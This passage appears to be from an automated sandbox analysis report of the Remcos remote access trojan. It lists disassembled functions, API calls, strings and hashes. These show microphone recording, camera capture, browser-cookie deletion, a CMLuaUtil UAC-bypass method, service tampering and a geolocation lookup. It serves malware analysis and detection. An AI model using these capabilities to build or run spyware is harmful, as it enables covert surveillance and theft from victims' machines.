                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                • API String ID: 1133728706-4073444585
                                                                                                • Opcode ID: 0339c64391aa7b84ad00c5218d2df4bd7b811f63d523d6f1ca175f0693cb59ff
                                                                                                • Instruction ID: 7718d61ab729039ae94473664947c91a52367f601ff6055b29c84dcba8ed2574
                                                                                                • Opcode Fuzzy Hash: 0339c64391aa7b84ad00c5218d2df4bd7b811f63d523d6f1ca175f0693cb59ff
                                                                                                • Instruction Fuzzy Hash: E7215230A40219A6CB14F7F1CC969EE7729AF50744F80017FE502B71D1EB7D6945C6DA
                                                                                                Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                                • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                                Function 00401A6D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401A7D
                                                                                                • waveInOpen.WINMM(00472AC0,000000FF,00472AC8,Function_00001B8F,00000000,00000000,00000024), ref: 00401B13
                                                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401B67
                                                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401B76
                                                                                                • waveInStart.WINMM ref: 00401B82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                • String ID: tMG
                                                                                                • API String ID: 1356121797-30866661
                                                                                                • Opcode ID: 9b1047c9ca44e2a749ab23d5d752e689566d8b18fd1d1c15b9f7858ca427b8e5
                                                                                                • Instruction ID: cbef553d477d36f78321a165484ecc4410fcecc505b8f9aca62d01b994c6c3e6
                                                                                                • Opcode Fuzzy Hash: 9b1047c9ca44e2a749ab23d5d752e689566d8b18fd1d1c15b9f7858ca427b8e5
                                                                                                • Instruction Fuzzy Hash: 8E2148716042019FC7299F6AEE09A697BAAFB84711B04403EE10DD76F1DBF848C5CB2C
                                                                                                Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                                Strings
                                                                                                • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                • String ID: http://geoplugin.net/json.gp
                                                                                                • API String ID: 3121278467-91888290
                                                                                                • Opcode ID: 9f9593b8f3cbf1af3f082b7aabeb6c93854d6e0b44bdec1d55487649986c7e5d
                                                                                                • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                                • Opcode Fuzzy Hash: 9f9593b8f3cbf1af3f082b7aabeb6c93854d6e0b44bdec1d55487649986c7e5d
                                                                                                • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                                Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                                • _free.LIBCMT ref: 00450FC8
                                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                • _free.LIBCMT ref: 00450FD3
                                                                                                • _free.LIBCMT ref: 00450FDE
                                                                                                • _free.LIBCMT ref: 00451032
                                                                                                • _free.LIBCMT ref: 0045103D
                                                                                                • _free.LIBCMT ref: 00451048
                                                                                                • _free.LIBCMT ref: 00451053
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                                Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                                • int.LIBCPMT ref: 004111BE
                                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                • String ID: 8mG
                                                                                                • API String ID: 2536120697-3990007011
                                                                                                • Opcode ID: 14799048d37b477e6c40f7e8d4f0e89b1ed2b05bcd10956721a24fc1261bb2b4
                                                                                                • Instruction ID: 3a14b803bc510f5ed1108d30ac07207671fc4f07faef22c9ffd8c11cb1ae2def
                                                                                                • Opcode Fuzzy Hash: 14799048d37b477e6c40f7e8d4f0e89b1ed2b05bcd10956721a24fc1261bb2b4
                                                                                                • Instruction Fuzzy Hash: D3112332900124A7CB14EBAAD8018DEBBA99F44364F11456FFE04B72E1DB789E41CBD8
                                                                                                Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                                • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                                                                • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                                • Opcode Fuzzy Hash: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                                                                • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                                Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 0040760B
                                                                                                  • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                  • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                • CoUninitialize.OLE32 ref: 00407664
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                • API String ID: 3851391207-3324213274
                                                                                                • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                                • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                                Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                                • GetLastError.KERNEL32 ref: 0040BB22
                                                                                                Strings
                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                                • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                                • UserProfile, xrefs: 0040BAE8
                                                                                                • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast
                                                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                • API String ID: 2018770650-304995407
                                                                                                • Opcode ID: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                                                                • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                                • Opcode Fuzzy Hash: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                                                                • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                                Function 0041CE2C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • AllocConsole.KERNEL32(00475348), ref: 0041CE35
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Console$AllocOutputShowWindow
                                                                                                • String ID: Remcos v$5.2.0 Pro$CONOUT$
                                                                                                • API String ID: 2425139147-793934204
                                                                                                • Opcode ID: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                                                                                • Instruction ID: a031bdd2f27af694b11ce09d1e3c688e218bb3586dee27dfc95755d0e541b829
                                                                                                • Opcode Fuzzy Hash: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                                                                                • Instruction Fuzzy Hash: 2D014471A80304BBD610F7F19D8BF9EB7AC9B18B05F500527BA04A70D2EB6DD944466E
                                                                                                Function 0040729B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • RG, xrefs: 004076DF
                                                                                                • 0SG, xrefs: 00407715
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 004076FF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$RG
                                                                                                • API String ID: 0-2653435807
                                                                                                • Opcode ID: b018cd633a599e0a64cff488a6689e85db8eb881d1095507843e93d878d2a38f
                                                                                                • Instruction ID: 8e81a4762a03630119b5543cf4782e43f3d691fcab72f30749e56a9243805afb
                                                                                                • Opcode Fuzzy Hash: b018cd633a599e0a64cff488a6689e85db8eb881d1095507843e93d878d2a38f
                                                                                                • Instruction Fuzzy Hash: 08F0F6B0A14141ABCB1067355D286AA3756A784397F00487BF547FB2F2EBBD5C82861E
                                                                                                Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __allrem.LIBCMT ref: 0043ACE9
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                                • __allrem.LIBCMT ref: 0043AD1C
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                                • __allrem.LIBCMT ref: 0043AD51
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                • String ID:
                                                                                                • API String ID: 1992179935-0
                                                                                                • Opcode ID: 52068ab3a7cfe922dfe01ed446ba536eb0656cd97dd847f62b494b0202e28e08
                                                                                                • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                                • Opcode Fuzzy Hash: 52068ab3a7cfe922dfe01ed446ba536eb0656cd97dd847f62b494b0202e28e08
                                                                                                • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                                Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prologSleep
                                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$XNG
                                                                                                • API String ID: 3469354165-985523790
                                                                                                • Opcode ID: 298a9f79e8f6c5b4aa2fe0a80a9800f543c0822915ef74d36e6591dd0581f9b7
                                                                                                • Instruction ID: 7593a199e81997f2aad1dc538160579efde4e563a54277089fa649d8e7e3dbe8
                                                                                                • Opcode Fuzzy Hash: 298a9f79e8f6c5b4aa2fe0a80a9800f543c0822915ef74d36e6591dd0581f9b7
                                                                                                • Instruction Fuzzy Hash: 2A51E0B1A042106BCA14FB369D0A66E3655ABC4748F00443FFA09676E2DF7D8E46839E
                                                                                                Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                                • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                                                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                                  • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                                  • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                                  • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 3950776272-0
                                                                                                • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                                • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                                Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __cftoe
                                                                                                • String ID:
                                                                                                • API String ID: 4189289331-0
                                                                                                • Opcode ID: a5d3cace08fe2293b93f252f036f94aa86e711d29a6ca0b520457e27db828097
                                                                                                • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                                • Opcode Fuzzy Hash: a5d3cace08fe2293b93f252f036f94aa86e711d29a6ca0b520457e27db828097
                                                                                                • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                                Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                • String ID:
                                                                                                • API String ID: 493672254-0
                                                                                                • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                                • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                                Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • _free.LIBCMT ref: 004482CC
                                                                                                • _free.LIBCMT ref: 004482F4
                                                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • _abort.LIBCMT ref: 00448313
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                • String ID:
                                                                                                • API String ID: 3160817290-0
                                                                                                • Opcode ID: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                                                                • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                                • Opcode Fuzzy Hash: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                                                                • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                                Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
